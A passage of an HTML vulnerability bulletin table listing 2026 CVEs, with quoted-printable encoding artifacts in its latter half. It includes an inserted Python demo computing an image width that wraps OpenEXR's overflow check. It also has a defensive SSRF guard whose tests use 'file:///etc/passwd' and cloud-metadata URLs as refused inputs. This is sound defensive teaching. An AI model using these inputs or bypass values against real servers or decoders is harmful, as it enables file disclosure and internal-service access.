    <a href="https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311</a><br>
    <a href="https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OCS Inventory--OCS Inventory NG Server</td>
    <td>OCS Inventory NG Server version 2.12.3 and prior contain a stored cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript by submitting malicious User-Agent HTTP headers to the /ocsinventory endpoint. Attackers can register rogue agents or craft requests with malicious User-Agent values that are stored without sanitization and rendered with insufficient encoding in the web console, leading to arbitrary JavaScript execution in the browsers of authenticated users viewing the statistics dashboard.</td>
    <td>2026-04-06</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22675" target="_blank" rel="noopener">CVE-2026-22675</a></td>
    <td><a href="https://github.com/OCSInventory-NG/OCSInventory-Server/pull/483" target="_blank" rel="noopener">https://github.com/OCSInventory-NG/OCSInventory-Server/pull/483</a><br>
    <a href="https://github.com/OCSInventory-NG/OCSInventory-Server/commit/78faf2ca8b897141ba4d337d75692ab8e405bd4e" target="_blank" rel="noopener">https://github.com/OCSInventory-NG/OCSInventory-Server/commit/78faf2ca8b897141ba4d337d75692ab8e405bd4e</a><br>
    <a href="https://www.vulncheck.com/advisories/ocs-inventory-ng-server-stored-xss-via-user-agent" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/ocs-inventory-ng-server-stored-xss-via-user-agent</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Volcengine--OpenViking</td>
    <td>OpenViking versions prior to 0.3.3 contain a missing authorization vulnerability in the task polling endpoints that allows unauthorized attackers to enumerate or retrieve background task metadata created by other users. Attackers can access the /api/v1/tasks and /api/v1/tasks/{task_id} routes without authentication to expose task type, task status, resource identifiers, archive URIs, result payloads, and error information, potentially causing cross-tenant interference in multi-tenant deployments.</td>
    <td>2026-04-07</td>
    <td>5.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22680" target="_blank" rel="noopener">CVE-2026-22680</a></td>
    <td><a href="https://github.com/volcengine/OpenViking/releases/tag/v0.3.3" target="_blank" rel="noopener">https://github.com/volcengine/OpenViking/releases/tag/v0.3.3</a><br>
    <a href="https://github.com/volcengine/OpenViking/pull/1182" target="_blank" rel="noopener">https://github.com/volcengine/OpenViking/pull/1182</a><br>
    <a href="https://github.com/volcengine/OpenViking/commit/8c1c3f3608364ee0bb0e45f73478771a68aebdf5" target="_blank" rel="noopener">https://github.com/volcengine/OpenViking/commit/8c1c3f3608364ee0bb0e45f73478771a68aebdf5</a><br>
    <a href="https://www.vulncheck.com/advisories/openviking-missing-authorization-via-task-polling" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/openviking-missing-authorization-via-task-polling</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">HDFGroup--hdf5</td>
    <td>HDF5 is software for managing data. In 1.14.1-2 and earlier, an attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition in the H5T__ref_mem_setnull method. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems.</td>
    <td>2026-04-10</td>
    <td>5.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29043" target="_blank" rel="noopener">CVE-2026-29043</a></td>
    <td><a href="https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277" target="_blank" rel="noopener">https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">smub--Charitable Donation Plugin for WordPress Fundraising with Recurring Donations &amp; More</td>
    <td>The Charitable - Donation Plugin for WordPress - Fundraising with Recurring Donations &amp; More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment.</td>
    <td>2026-04-07</td>
    <td>5.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3177" target="_blank" rel="noopener">CVE-2026-3177</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve</a><br>
    <a href="https://plugins.trac.wordpress.org/changeset/3485023/charitable" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3485023/charitable</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--mirror registry for Red Hat OpenShift</td>
    <td>A flaw was found in Red Hat Quay's Proxy Cache configuration feature. When an organization administrator configures an upstream registry for proxy caching, Quay makes a network connection to the specified registry hostname without verifying that it points to a legitimate external service. An attacker with organization administrator privileges could supply a crafted hostname to force the Quay server to make requests to internal network services, cloud infrastructure endpoints, or other resources that should not be accessible from the Quay application.</td>
    <td>2026-04-08</td>
    <td>5.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32591" target="_blank" rel="noopener">CVE-2026-32591</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2026-32591" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2026-32591</a><br>
    <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2446965" target="_blank" rel="noopener">RHBZ#2446965</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">opensourcepos--opensourcepos</td>
    <td>Open Source Point of Sale is a web-based point-of-sale application written in PHP using the CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3.</td>
    <td>2026-04-07</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32712" target="_blank" rel="noopener">CVE-2026-32712</a></td>
    <td><a href="https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp" target="_blank" rel="noopener">https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, a Reflected Cross-Site Scripting (XSS) vulnerability in the exercise question list admin panel allows an attacker to execute arbitrary JavaScript in an authenticated teacher's browser. The pagination code merges all $_GET parameters via array_merge() and outputs the result via http_build_query() directly into HTML href attributes without htmlspecialchars() encoding. This vulnerability is fixed in 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32893" target="_blank" rel="noopener">CVE-2026-32893</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc</a><br>
    <a href="https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Microsoft--Microsoft Edge for Android</td>
    <td>User interface (UI) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.</td>
    <td>2026-04-10</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33119" target="_blank" rel="noopener">CVE-2026-33119</a></td>
    <td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119" target="_blank" rel="noopener">Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">pi-hole--web</td>
    <td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, configuration values from the /api/config endpoint are placed directly into HTML value="" attributes without escaping in settings-advanced.js, enabling HTML attribute injection. A double quote in any config value breaks out of the attribute context. JavaScript execution is blocked by the server's CSP (script-src 'self'), but injected attributes can alter element styling for UI redressing. The primary attack vector is importing a malicious teleporter backup, which bypasses per-field server-side validation. This vulnerability is fixed in 6.5.</td>
    <td>2026-04-06</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33406" target="_blank" rel="noopener">CVE-2026-33406</a></td>
    <td><a href="https://github.com/pi-hole/web/security/advisories/GHSA-9rfm-c5g6-538p" target="_blank" rel="noopener">https://github.com/pi-hole/web/security/advisories/GHSA-9rfm-c5g6-538p</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">themeum--Tutor LMS eLearning and online course solution</td>
    <td>The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized private course enrollment in all versions up to, and including, 3.9.7. This is due to missing post_status validation in the `enroll_now()` and `course_enrollment()` functions. Both enrollment endpoints verify the nonce, user authentication, and whether the course is purchasable, but fail to check if the course has a `private` post_status. This makes it possible for authenticated attackers with Subscriber-level access or above to enroll in private courses by sending a crafted POST request with the target course ID. The enrollment record is created in the database and the private course title and enrollment status are exposed in the subscriber's dashboard, though WordPress core access control prevents the subscriber from viewing the actual course content (returns 404). Enrollment in private courses should be restricted to users with the `read_private_posts` capability.</td>
    <td>2026-04-11</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3358" target="_blank" rel="noopener">CVE-2026-3358</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228-4253-bb28-2c2e11af76fd?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228-4253-bb28-2c2e11af76fd?source=cve</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2989" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2989</a><br>
    <a href="https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8</a><br>
    <a href="https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Course.php" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Course.php</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38.</td>
    <td>2026-04-10</td>
    <td>5.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33705" target="_blank" rel="noopener">CVE-2026-33705</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57</a><br>
    <a href="https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, multiple files use simplexml_load_string() without XXE protection. With the LIBXML_NOENT flag, arbitrary server files can be read. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>5.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33737" target="_blank" rel="noopener">CVE-2026-33737</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j</a><br>
    <a href="https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e</a><br>
    <a href="https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Incorrect Initialization of Resource vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX Series and QFX Series devices allows an unauthenticated, network-based attacker to cause an integrity impact to downstream networks. When the same family inet or inet6 filter is applied on an IRB interface and on a physical interface as egress filter on EX4100, EX4400, EX4650 and QFX5120 devices, only one of the two filters will be applied, which can lead to traffic being sent out one of these interfaces which should have been blocked. This issue affects Junos OS on EX Series and QFX Series: * 23.4 version 23.4R2-S6, * 24.2 version 24.2R2-S3. No other Junos OS versions are affected.</td>
    <td>2026-04-09</td>
    <td>5.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33773" target="_blank" rel="noopener">CVE-2026-33773</a></td>
    <td><a href="https://kb.juniper.net/JSA107815" target="_blank" rel="noopener">https://kb.juniper.net/JSA107815</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS and Junos OS Evolved allows a local user with low privileges to read sensitive information. A local user with low privileges can execute the CLI command 'show mgd' with specific arguments which will expose sensitive information. This issue affects Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S1, * 25.2 version before 25.2R1-S2, 25.2R2; Junos OS Evolved: * all versions before 23.2R2-S6-EVO, * 23.4 version before 23.4R2-S6-EVO, * 24.2 version before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S1-EVO, * 25.2 versions before 25.2R2-EVO.</td>
    <td>2026-04-09</td>
    <td>5.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33776" target="_blank" rel="noopener">CVE-2026-33776</a></td>
    <td><a href="https://kb.juniper.net/JSA107866" target="_blank" rel="noopener">https://kb.juniper.net/JSA107866</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1600, SRX2300 and SRX4300 allows a local attacker with low privileges to cause a complete Denial of Service (DoS). When a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again. This issue affects Junos OS on SRX1600, SRX2300 and SRX4300: * 24.4 versions before 24.4R1-S3, 24.4R2. This issue does not affect Junos OS versions before 24.4R1.</td>
    <td>2026-04-09</td>
    <td>5.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33786" target="_blank" rel="noopener">CVE-2026-33786</a></td>
    <td><a href="https://kb.juniper.net/JSA107810" target="_blank" rel="noopener">https://kb.juniper.net/JSA107810</a><br>
    &nbsp;</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Check for Unusual or Exceptional Conditions vulnerability i=
    n the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX= 1500, SRX4100, SRX4200 and SRX4600 allows a local attacker with low privile= ges to cause a complete Denial of Service (DoS). When a specific 'show chas= sis' CLI command is executed, chassisd crashes and restarts which causes a = momentary impact to all traffic until all modules are online again. This is= sue affects Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600:=C2=A0 * 23.2=
    versions before=C2=A023.2R2-S6, * 23.4 versions before=C2=A023.4R2-S7, * 24=
    .2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 version=
    s before 25.2R1-S1, 25.2R2.</td>
    <td>2026-04-09</td>
    <td>5.5</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33787" target=3D= "_blank" rel=3D"noopener">CVE-2026-33787</a></td>
    <td>
    <a href=3D"https://kb.juniper.net/JSA107873" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107873</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">AcademySoftwareFoundation--openexr</td> <td>OpenEXR provides the specification and reference implementation of the = EXR file format, an image storage format for the motion picture industry. F= rom 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a signed integer overflow exis=
    ts in undo_pxr24_impl() in src/lib/OpenEXRCore/internal_pxr24.c at line 377=
    . The expression (uint64_t)(w * 3) computes w * 3 as a signed 32-bit intege=
    r before casting to uint64_t. When w is large, this multiplication constitu= tes undefined behavior under the C standard. On tested builds (clang/gcc wi= thout sanitizers), two's-complement wraparound commonly occurs, and for spe= cific values of w the wrapped result is a small positive integer, which may=
    allow the subsequent bounds check to pass incorrectly. If the check is byp= assed, the decoding loop proceeds to write pixel data through dout, potenti= ally extending far beyond the allocated output buffer. This vulnerability i=
    s fixed in 3.2.7, 3.3.9, and 3.4.9.</td>
    <td>2026-04-06</td>
    <td>5.9</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34380" target=3D= "_blank" rel=3D"noopener">CVE-2026-34380</a></td>
    <td>
    <a href=3D"https://github.com/AcademySoftwareFoundation/openexr/security/ad= visories/GHSA-q3v8-hw4m-59w5" target=3D"_blank" rel=3D"noopener">https://gi= thub.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-q3v8-hw= 4m-59w5</a><br><a href=3D"https://github.com/AcademySoftwareFoundation/open= exr/releases/tag/v3.2.7" target=3D"_blank" rel=3D"noopener">https://github.= com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href=3D= "https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" = target=3D"_blank" rel=3D"noopener">https://github.com/AcademySoftwareFounda= tion/openexr/releases/tag/v3.3.9</a><br><a href=3D"https://github.com/Acade= mySoftwareFoundation/openexr/releases/tag/v3.4.9" target=3D"_blank" rel=3D"= noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag= /v3.4.9</a><br>=C2=A0</td>
    </tr>
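<p>The OpenEXR entry above turns on one expression: the width is multiplied in 32-bit signed arithmetic and only the wrapped product is widened to 64 bits, so for certain widths the bounds check sees a tiny number while the decode loop still walks the real w*3 bytes. The block below is an added example, not OpenEXR's code: Python integers never wrap, so c_int32_mul() emulates the two's-complement wraparound the advisory observed on unsanitised gcc/clang builds (the C standard calls the overflow undefined). The function names, the 4 KiB output buffer and the widening fix are assumptions made for the demonstration; the fixed expression models the straightforward repair of widening before multiplying and refusing negative widths.</p>

```python
"""Added example (not OpenEXR code): the arithmetic behind CVE-2026-34380.

Models (uint64_t)(w * 3) from undo_pxr24_impl() with w a C 'int'. The
multiply happens in int32, and only the wrapped result is widened, so the
bounds check can compare against a small number while the loop uses w.
"""

INT32_MAX = (1 << 31) - 1
UINT64_MASK = (1 << 64) - 1


def c_int32_mul(a: int, b: int) -> int:
    """a * b as a C int with two's-complement wraparound (emulation of what
    unsanitised gcc/clang builds did; the C standard leaves it undefined)."""
    r = (a * b) & 0xFFFFFFFF
    return r - (1 << 32) if r > INT32_MAX else r


def vulnerable_row_bytes(w: int) -> int:
    """(uint64_t)(w * 3): multiply as int, THEN widen. A product that wraps
    negative becomes a huge uint64 (check fails, harmless); one that wraps into
    [0, 2^31) becomes a small uint64 (check passes, buffer overrun)."""
    return c_int32_mul(w, 3) & UINT64_MASK


def fixed_row_bytes(w: int) -> int:
    """(uint64_t)w * 3: widen FIRST, then multiply in 64-bit. Exact for every
    non-negative int32 w; negative widths are rejected instead of widened."""
    if w < 0:
        raise ValueError(f"negative width {w}")
    return (w * 3) & UINT64_MASK


def check_passes(row_bytes_fn, w: int, out_avail: int) -> bool:
    """The guard in front of the decode loop: proceed only if the row fits."""
    try:
        return row_bytes_fn(w) <= out_avail
    except ValueError:
        return False


def overrun_bytes(w: int, out_avail: int) -> int:
    """Bytes written past the buffer if the guard is bypassed: the loop is
    driven by the real w, not by the wrapped value the check looked at."""
    return max(0, 3 * w - out_avail)


def width_that_wraps_to(r: int) -> int:
    """The int32 width w for which c_int32_mul(w, 3) == r, if one exists.

    w*3 must equal 2^32 + r: k = 1 is the only multiple of 2^32 reachable,
    since 2^33 / 3 already exceeds INT32_MAX. So 2^32 + r must be divisible
    by 3, i.e. r % 3 == 2 because 2^32 % 3 == 1."""
    total = (1 << 32) + r
    if r < 0 or total % 3 != 0:
        raise ValueError(f"no int32 width wraps to {r}")
    w = total // 3
    if w > INT32_MAX:
        raise ValueError(f"width {w} does not fit in int32")
    return w


if __name__ == "__main__":
    avail = 4096                 # constructed: a 4 KiB output buffer
    w = width_that_wraps_to(2)   # 0x55555556: 3*w == 2^32 + 2, wraps to 2
    print(f"w={w:#x}: vulnerable check sees {vulnerable_row_bytes(w)}, real row is {3 * w} bytes")
    print("vulnerable guard passes:", check_passes(vulnerable_row_bytes, w, avail))
    print("fixed guard passes:     ", check_passes(fixed_row_bytes, w, avail))
    print("overrun if bypassed:    ", overrun_bytes(w, avail), "bytes")
```

<p>The same shape (narrow multiply, late widen) is worth grepping for in any decoder: the fix is to widen every operand before the multiply, and where the language allows it to use an overflow-checked multiply such as <code>__builtin_mul_overflow</code> so that a width the check cannot represent is rejected rather than wrapped.</p>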
    <tr>
    <td class=3D"vendor-product">vllm-project--vllm</td>
    <td>vLLM is an inference and serving engine for large language models (LLMs=
    ). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulne= rability in download_bytes_from_url allows any actor who can control batch = input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS request=
    s from the server, without any URL validation or domain restrictions. This = can be used to target internal services (e.g. cloud metadata endpoints or i= nternal HTTP APIs) reachable from the vLLM host. This vulnerability is fixe=
    d in 0.19.0.</td>
    <td>2026-04-06</td>
    <td>5.4</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34753" target=3D= "_blank" rel=3D"noopener">CVE-2026-34753</a></td>
    <td>
    <a href=3D"https://github.com/vllm-project/vllm/security/advisories/GHSA-pf= 3h-qjgv-vcpr" target=3D"_blank" rel=3D"noopener">https://github.com/vllm-pr= oject/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr</a><br>=C2=A0</td>
    </tr>
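<p>The vLLM entry above describes a fetcher that issues requests to whatever URL appears in attacker-controlled batch input. What such a fetcher needs in front of every request is an egress guard; the block below is an added example of one, not vLLM's own code. It allows only http/https, refuses embedded credentials, resolves the host and rejects the URL if any answer is loopback, private, link-local (169.254.169.254 is the cloud metadata service the entry mentions), multicast, reserved, unspecified, or an IPv4-mapped IPv6 form of one of those, and it follows redirects by hand so that each hop is checked again. The function names, FAKE_DNS table, fake fetcher and the 93.184.216.34 "public" address are constructed fixtures so the example runs offline; resolve_all() is the real resolver.</p>

```python
"""Added example (not vLLM code): an egress guard for a URL fetcher like the
download_bytes_from_url() named in CVE-2026-34753. Every hop, including each
redirect target, must pass check_url() before a request is sent."""
import ipaddress
import socket
from typing import Callable, Iterable, List, Optional, Tuple, Union
from urllib.parse import urljoin, urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
ALLOWED_SCHEMES = frozenset({"http", "https"})
REDIRECT_CODES = frozenset({301, 302, 303, 307, 308})


def is_public(ip: IPAddr) -> bool:
    """True only for addresses an inference server may fetch from."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:a.b.c.d by the IPv4 address it wraps
    return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
                or ip.is_reserved or ip.is_unspecified or not ip.is_global)


def resolve_all(host: str) -> List[IPAddr]:
    """Every A/AAAA answer for host; a literal IP resolves to itself."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return list({ipaddress.ip_address(info[4][0]) for info in infos})


def check_url(url: str, resolver: Callable[[str], Iterable[IPAddr]] = resolve_all,
              host_allowlist: Optional[Iterable[str]] = None) -> Tuple[bool, str]:
    """Return (ok, reason) for one URL. Run again on every redirect hop."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if host_allowlist is not None and host not in {h.lower() for h in host_allowlist}:
        return False, f"host {host!r} not in allowlist"
    addrs = list(resolver(host))
    if not addrs:
        return False, f"host {host!r} does not resolve"
    for ip in addrs:  # one internal answer poisons the whole name (split horizon, rebinding)
        if not is_public(ip):
            return False, f"host {host!r} resolves to non-public address {ip}"
    return True, "ok"


def fetch_checked(url: str, fetch: Callable[[str], Tuple[int, Optional[str], bytes]],
                  resolver: Callable[[str], Iterable[IPAddr]] = resolve_all,
                  max_redirects: int = 3) -> bytes:
    """Fetch with every hop validated. `fetch(url)` must NOT follow redirects
    itself; it returns (status, Location header or None, body)."""
    for _ in range(max_redirects + 1):
        ok, why = check_url(url, resolver)
        if not ok:
            raise ValueError(f"refusing {url}: {why}")
        status, location, body = fetch(url)
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)  # absolutise a relative Location, re-check next loop
            continue
        return body
    raise ValueError(f"refusing {url}: too many redirects")


# Constructed fixtures (assumptions for the demo, not real infrastructure).
FAKE_DNS = {
    "models.example.net": ["93.184.216.34"],              # an ordinary public host
    "rebind.example.net": ["93.184.216.34", "10.0.0.5"],  # public answer plus an internal one
}


def fake_resolver(host: str) -> List[IPAddr]:
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        return [ipaddress.ip_address(a) for a in FAKE_DNS.get(host, [])]


def fake_fetch(url: str) -> Tuple[int, Optional[str], bytes]:
    """Redirect-disabled HTTP client stand-in; /hop bounces to the metadata service."""
    if url == "https://models.example.net/batch.jsonl":
        return 200, None, b'{"custom_id": "req-1", "method": "POST", "url": "/v1/chat/completions"}\n'
    if url == "https://models.example.net/hop":
        return 302, "http://169.254.169.254/latest/meta-data/", b""
    return 200, None, b"unreachable: the guard should have refused this URL"


if __name__ == "__main__":
    print(fetch_checked("https://models.example.net/batch.jsonl", fake_fetch, fake_resolver))
    for bad in ("https://models.example.net/hop", "http://rebind.example.net/x",
                "http://[::ffff:169.254.169.254]/", "file:///etc/passwd"):
        try:
            fetch_checked(bad, fake_fetch, fake_resolver)
        except ValueError as err:
            print(err)
```

<p>Two caveats a deployment should keep in mind. First, the HTTP client must really have redirects disabled (<code>allow_redirects=False</code> in requests, <code>follow_redirects=False</code> in httpx), otherwise the per-hop check never runs. Second, checking the resolved address and then letting the client resolve the name again opens a DNS-rebinding window; where the client supports it, connect to the address that was validated rather than to the name, and prefer a host allowlist over a denylist when the set of legitimate sources is known.</p>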
    <tr>
    <td class=3D"vendor-product">pnggroup--libpng</td>
    <td>LIBPNG is a reference library for use in applications that read, create=
    , and manipulate PNG (Portable Network Graphics) raster image files. From 1= .0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_ge= t_tRNS, or png_get_hIST back into the corresponding setter on the same png_= struct/png_info pair causes the setter to read from freed memory and copy i=
    ts contents into the replacement buffer. The setter frees the internal buff=
    er before copying from the caller-supplied pointer, which now dangles. The = freed region may contain stale data (producing silently corrupted chunk met= adata) or data from subsequent heap allocations (leaking unrelated heap con= tents into the chunk struct). This vulnerability is fixed in 1.6.57.</td> <td>2026-04-09</td>
    <td>5.1</td>
